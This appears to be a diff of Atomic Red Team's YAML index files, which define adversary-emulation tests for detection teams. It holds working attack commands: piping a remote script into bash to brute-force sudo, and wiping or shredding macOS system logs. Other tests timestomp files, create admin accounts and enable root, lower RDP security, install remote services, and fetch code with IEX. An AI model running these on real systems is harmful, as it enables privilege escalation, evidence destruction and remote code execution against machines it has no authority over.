+          curl -s #{remote_url} |bash
+        cleanup_command: 'userdel -fr art
 
           '
-        name: sh
-    - name: SUDO brute force Redhat
-      auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
-      description: "Brute force the password of a local user account which is a member
-        of the sudo'ers group on a Redhat based Linux distribution.  \n"
+    - name: SUDO Brute Force - Redhat
+      auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
+      description: "An adversary may find themselves on a box (e.g. via ssh key auth,
+        with no password) with a user that has sudo'ers privileges, but they do not
+        know the users password. Normally, failed attempts to access root will not
+        cause the root account to become locked, to prevent denial-of-service. This
+        functionality enables an attacker to undertake a local brute force password
+        guessing attack without locking out the root user. \n\nThis test creates the
+        \"art\" user with a password of \"password123\", logs in, downloads and executes
+        the sudo_bruteforce.sh which brute force guesses the password, then deletes
+        the user\n"
       supported_platforms:
       - linux
-      dependency_executor_name: sh
+      input_arguments:
+        remote_url:
+          description: url of remote payload
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+      dependency_executor_name: bash
       dependencies:
       - description: 'Check if running on a Redhat based machine.
 
           '
         prereq_command: |
-          if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
+          if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
           if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
-          if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-          if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-        get_prereq_command: 'yum -y update && yum install -y openssl sudo
+          if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+          if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+        get_prereq_command: 'yum update && yum install -y openssl sudo curl
 
           '
       executor:
+        name: bash
         elevation_required: true
         command: |
-          useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
-          su target
-
-          PASSWORDS=(one two three password five); \
-              touch /tmp/file; \
-              for P in ${PASSWORDS[@]}; do \
-                  date +"%b %d %T"; \
-                  sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-                  echo "exit: $?"; \
-                  if grep -q "root" /tmp/file; then \
-                      echo "FOUND: sudo => $P"; break; \
-                  else \
-                      echo "TRIED: $P"; \
-                  fi; \
-                  sleep 2; \
-              done; \
-              rm /tmp/file
-        cleanup_command: 'userdel target
+          useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
+          su art
+          cd /tmp
+          curl -s #{remote_url} |bash
+        cleanup_command: 'userdel -fr art
 
           '
-        name: sh
   T1003:
     technique:
       x_mitre_platforms:

atomics/Indexes/macos-index.yaml

@@ -2745,6 +2745,164 @@ defense-evasion:
           sudo rm -rf /private/var/audit/*
         name: sh
         elevation_required: true
+    - name: Delete log files using built-in log utility
+      auto_generated_guid: 653d39cd-bae7-499a-898c-9fb96b8b5cd1
+      description: 'This test deletes main log datastore, inflight log data, time-to-live
+        data(TTL), fault and error content
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: |
+          sudo log erase --all
+          sudo log erase --ttl #Deletes only time-to-live log content
+          sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
+        name: sh
+        elevation_required: true
+    - name: Truncate system log files via truncate utility
+      auto_generated_guid: 6290f8a8-8ee9-4661-b9cf-390031bf6973
+      description: 'This test truncates the system log files using the truncate utility
+        with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying
+        the file content
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo
+          truncate --size=0 /var/log/system.log #size parameter \n"
+        name: sh
+        elevation_required: true
+    - name: Delete log files via cat utility by appending /dev/null or /dev/zero
+      auto_generated_guid: c23bdb88-928d-493e-b46d-df2906a50941
+      description: 'The first sub-test truncates the log file to zero bytes via /dev/null
+        and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero,
+        using cat utility
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: |
+          sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
+          sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+        name: sh
+        elevation_required: true
+    - name: System log file deletion via find utility
+      auto_generated_guid: bc8eeb4a-cc3e-45ec-aa6e-41e973da2558
+      description: 'This test finds and deletes the system log files within /var/log/
+        directory using various executions(rm, shred, unlink)
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: |
+          sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
+          sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+          sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+        name: sh
+        elevation_required: true
+    - name: Overwrite macOS system log via echo utility
+      auto_generated_guid: '0208ea60-98f1-4e8c-8052-930dce8f742c'
+      description: 'This test overwrites the contents of system log file with an empty
+        string using echo utility
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'sudo echo '''' > /var/log/system.log
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Real-time system log clearance/deletion
+      auto_generated_guid: 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c
+      description: 'This test reads real-time system log file and writes empty string
+        to it, thus clearing the log file without tampering with the logging process
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'sudo log -f /var/log/system.log | : > /var/log/system.log
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Delete system log files via unlink utility
+      auto_generated_guid: 03013b4b-01db-437d-909b-1fdaa5010ee8
+      description: 'This test deletes the system log file using unlink utility
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'sudo unlink /var/log/system.log
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Delete system log files using shred utility
+      auto_generated_guid: 86f0e4d5-3ca7-45fb-829d-4eda32b232bb
+      description: 'This test overwrites the contents of the log file with zero bytes(-z)
+        using three passes(-n 3) of data, and then delete the file(-u) securely
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'sudo shred -u -z -n 3 /var/log/system.log
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Delete system log files using srm utility
+      auto_generated_guid: b0768a5e-0f32-4e75-ae5b-d036edcf96b6
+      description: |
+        This test securely deletes the system log files individually and recursively using the srm utility.
+        Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm
+        Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
+      supported_platforms:
+      - macos
+      executor:
+        command: |
+          sudo srm /var/log/system.log #system log file deletion
+          sudo srm -r /var/log/ #recursive deletion of log files
+        name: sh
+        elevation_required: true
+    - name: Delete system log files using OSAScript
+      auto_generated_guid: 810a465f-cd4f-47bc-b43e-d2de3b033ecc
+      description: 'This test deletes the system log file using osascript via "do
+        shell script"(sh/bash by default) which in-turn spawns rm utility, requires
+        admin privileges
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator
+          privileges''
+
+          '
+        name: sh
+        elevation_required: true
+    - name: Delete system log files using Applescript
+      auto_generated_guid: e62f8694-cbc7-468f-862c-b10cd07e1757
+      description: |
+        This test deletes the system log file using applescript using osascript via Finder application
+        Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework.
+        Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
+      supported_platforms:
+      - macos
+      executor:
+        command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"''
+
+          '
+        name: sh
+        elevation_required: true
   T1218.004:
     technique:
       x_mitre_platforms:
@@ -3865,10 +4023,6 @@ defense-evasion:
           description: Encoded
           type: string
           default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
-        zsh_encoded:
-          description: Encoded
-          type: string
-          default: IyEvYmluL3pzaAplY2hvICJodHRwczovL3d3dy55b3V0dWJlLmNvbS9AYXRvbWljc29uYWZyaWRheSBGVFciCg==
         fish_encoded:
           description: Encoded
           type: string
@@ -4527,10 +4681,23 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-access.txt"
+      dependencies:
+      - description: 'The file must exist in order to be timestomped
+
+          '
+        prereq_command: 'test -e #{target_filename} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'echo ''T1070.006 file access timestomp test'' > #{target_filename}
+
+          '
       executor:
         command: 'touch -a -t 197001010000.00 #{target_filename}
 
+          '
+        cleanup_command: 'rm -f #{target_filename}
+
           '
         name: sh
     - name: Set a file's modification timestamp
@@ -4545,10 +4712,24 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-modification.txt"
+      dependencies:
+      - description: 'The file must exist in order to be timestomped
+
+          '
+        prereq_command: 'test -e #{target_filename} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'echo ''T1070.006 file modification timestomp test'' >
+          #{target_filename}
+
+          '
       executor:
         command: 'touch -m -t 197001010000.00 #{target_filename}
 
+          '
+        cleanup_command: 'rm -f #{target_filename}
+
           '
         name: sh
     - name: Set a file's creation timestamp
@@ -4565,14 +4746,18 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-creation.txt"
       executor:
+        elevation_required: true
         command: |
-          NOW=$(date)
-          date -s "1970-01-01 00:00:00"
+          NOW=$(date +%m%d%H%M%Y)
+          date 010100001971
           touch #{target_filename}
-          date -s "$NOW"
+          date "$NOW"
           stat #{target_filename}
+        cleanup_command: 'rm -f #{target_filename}
+
+          '
         name: sh
     - name: Modify file timestamps using reference file
       auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50
@@ -4587,14 +4772,27 @@ defense-evasion:
         target_file_path:
           description: Path of file to modify timestamps of
           type: path
-          default: "/opt/filename"
+          default: "/tmp/T1070.006-reference.txt"
         reference_file_path:
           description: Path of reference file to read timestamps from
           type: path
           default: "/bin/sh"
+      dependencies:
+      - description: 'The file must exist in order to be timestomped
+
+          '
+        prereq_command: 'test -e #{target_file_path} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'echo ''T1070.006 reference file timestomp test'' > #{target_file_path}
+
+          '
       executor:
         command: 'touch -acmr #{reference_file_path} #{target_file_path}
 
+          '
+        cleanup_command: 'rm -f #{target_file_path}
+
           '
         name: sh
   T1620:
@@ -6091,7 +6289,7 @@ defense-evasion:
     - name: Pad Binary to Change Hash - Linux/macOS dd
       auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a
       description: |
-        Uses dd to add a zero to the binary to change the hash.
+        Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.
 
         Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
       supported_platforms:
@@ -6114,7 +6312,41 @@ defense-evasion:
 
           '
       executor:
-        command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
+        command: |
+          dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
+          dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
+          dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
+        cleanup_command: 'rm #{file_to_pad}
+
+          '
+        name: sh
+    - name: Pad Binary to Change Hash using truncate command - Linux/macOS
+      auto_generated_guid: e22a9e89-69c7-410f-a473-e6c212cd2292
+      description: |
+        Uses truncate to add a byte to the binary to change the hash.
+
+        Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_to_pad:
+          description: Path of binary to be padded
+          type: path
+          default: "/tmp/evil-binary"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'The binary must exist on disk at specified location (#{file_to_pad})
+
+          '
+        prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
+
+          '
+        get_prereq_command: 'cp /bin/ls #{file_to_pad}
+
+          '
+      executor:
+        command: 'truncate -s +1 #{file_to_pad} #adds a byte to the file size
 
           '
         cleanup_command: 'rm #{file_to_pad}
@@ -8688,6 +8920,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -13981,13 +14214,31 @@ defense-evasion:
       - linux
       - macos
       input_arguments:
+        parent_folder:
+          description: Path of parent folder
+          type: path
+          default: "/tmp/victim-files/"
         file_to_delete:
           description: Path of file to delete
           type: path
-          default: "/tmp/victim-files/a"
+          default: "/tmp/victim-files/T1070.004-test.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'The file must exist in order to be deleted
+
+          '
+        prereq_command: 'test -e #{file_to_delete} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'mkdir -p #{parent_folder} && touch #{file_to_delete}
+
+          '
       executor:
         command: 'rm -f #{file_to_delete}
 
+          '
+        cleanup_command: 'rm -rf #{parent_folder}
+
           '
         name: sh
     - name: Delete an entire folder - Linux/macOS
@@ -14003,7 +14254,18 @@ defense-evasion:
         folder_to_delete:
           description: Path of folder to delete
           type: path
-          default: "/tmp/victim-files"
+          default: "/tmp/victim-folder"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'The folder must exist in order to be deleted
+
+          '
+        prereq_command: 'test -e #{folder_to_delete} && exit 0 || exit 1
+
+          '
+        get_prereq_command: 'mkdir -p #{folder_to_delete}
+
+          '
       executor:
         command: 'rm -rf #{folder_to_delete}
 
@@ -16433,6 +16695,45 @@ defense-evasion:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
   T1211:
     technique:
       x_mitre_platforms:
@@ -26973,6 +27274,45 @@ privilege-escalation:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
   T1574.012:
     technique:
       x_mitre_platforms:
@@ -29877,6 +30217,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -43389,6 +43730,45 @@ persistence:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
   T1574.012:
     technique:
       x_mitre_platforms:
@@ -68052,6 +68432,45 @@ initial-access:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
 exfiltration:
   T1567:
     technique:

atomics/Indexes/office-365-index.yaml

@@ -7766,6 +7766,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -27503,6 +27504,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:

atomics/Indexes/saas-index.yaml

@@ -7766,6 +7766,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -27418,6 +27419,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:

atomics/Indexes/windows-index.yaml

@@ -3072,9 +3072,9 @@ defense-evasion:
         command: |
           sc.exe create #{service_name} binPath= "#{executable_command}"
           sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
-        cleanup_command: 'sc.exe delete #{service_name}
-
-          '
+        cleanup_command: |
+          sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
+          sc.exe delete #{service_name}
         name: command_prompt
         elevation_required: true
   T1484.002:
@@ -9733,6 +9733,24 @@ defense-evasion:
           Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /f
         name: command_prompt
         elevation_required: true
+    - name: Enabling Remote Desktop Protocol via Remote Registry
+      auto_generated_guid: e3ad8e83-3089-49ff-817f-e52f8c948090
+      description: 'Enabling RDP through remote registry.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp"
+          /v SecurityLayer /t REG_DWORD /d 0 /f
+
+          '
+        cleanup_command: 'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal
+          Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 2 /f
+
+          '
+        name: command_prompt
+        elevation_required: true
   T1574.008:
     technique:
       x_mitre_platforms:
@@ -13065,6 +13083,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -27210,6 +27229,54 @@ privilege-escalation:
           reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
         name: command_prompt
         elevation_required: true
+    - name: Remote Service Installation CMD
+      auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
+      description: |
+        Download an executable from github and start it as a service on a remote endpoint
+        Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_path:
+          description: Name of the service binary, include path.
+          type: path
+          default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
+        service_type:
+          description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
+          type: String
+          default: Own
+        startup_type:
+          description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
+          type: String
+          default: auto
+        service_name:
+          description: Name of the Service
+          type: string
+          default: AtomicTestService_CMD
+        remote_host:
+          description: Name of the remote endpoint
+          type: string
+          default: localhost
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Service binary must exist on disk at specified location (#{binary_path})
+
+          '
+        prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+          sc.exe \\#{remote_host} start #{service_name}
+        cleanup_command: |-
+          sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+          sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
   T1053.003:
     technique:
       x_mitre_platforms:
@@ -34181,6 +34248,49 @@ privilege-escalation:
         cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
           Processor" -Name "AutoRun" -ErrorAction Ignore
         name: powershell
+    - name: WMI Invoke-CimMethod Start Process
+      auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
+      description: |
+        The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+        This is a novel way to perform lateral movement or to start a remote process.
+        This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+        A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest:
+          description: destination computer name
+          type: string
+          default: localhost
+        password:
+          description: password for account
+          type: string
+          default: P@ssword1
+        username:
+          description: account to use
+          type: string
+          default: Administrator
+        process:
+          description: process to spawn
+          type: string
+          default: calc.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Set the remote computer name and credentials\n $RemoteComputer
+          = \"#{dest}\"\n $PWord = ConvertTo-SecureString -String \"#{password}\"
+          -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential
+          -ArgumentList \"#{username}\", $Pword\n\n # Create a CIM session\n $CimSession
+          = New-CimSession -ComputerName $RemoteComputer -Credential $Credential\n\n
+          # Define the process you want to start\n $ProcessToStart = \"#{process}\"\n\n
+          # Invoke the Create method on the Win32_Process class to start the process\n
+          $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process
+          -MethodName Create -Arguments @{CommandLine = $ProcessToStart}\n\n # Check
+          the result\n if ($Result.ReturnValue -eq 0) {\n     Write-Host \"Process
+          started successfully with Process ID: $($Result.ProcessId)\"\n } else {\n
+          \    Write-Host \"Failed to start the process. Error code: $($Result.ReturnValue)\"\n
+          }\n\n # Clean up the CIM session\n Remove-CimSession -CimSession $CimSession
+          \n"
   T1546.004:
     technique:
       x_mitre_platforms:
@@ -42211,7 +42321,158 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
-    atomic_tests: []
+      identifier: T1559
+    atomic_tests:
+    - name: Cobalt Strike Artifact Kit pipe
+      auto_generated_guid: bd13b9fc-b758-496a-b81a-397462f82c72
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          1
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike Lateral Movement (psexec_psh) pipe
+      auto_generated_guid: 830c8b6c-7a70-4f40-b975-8bbe74558acd
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
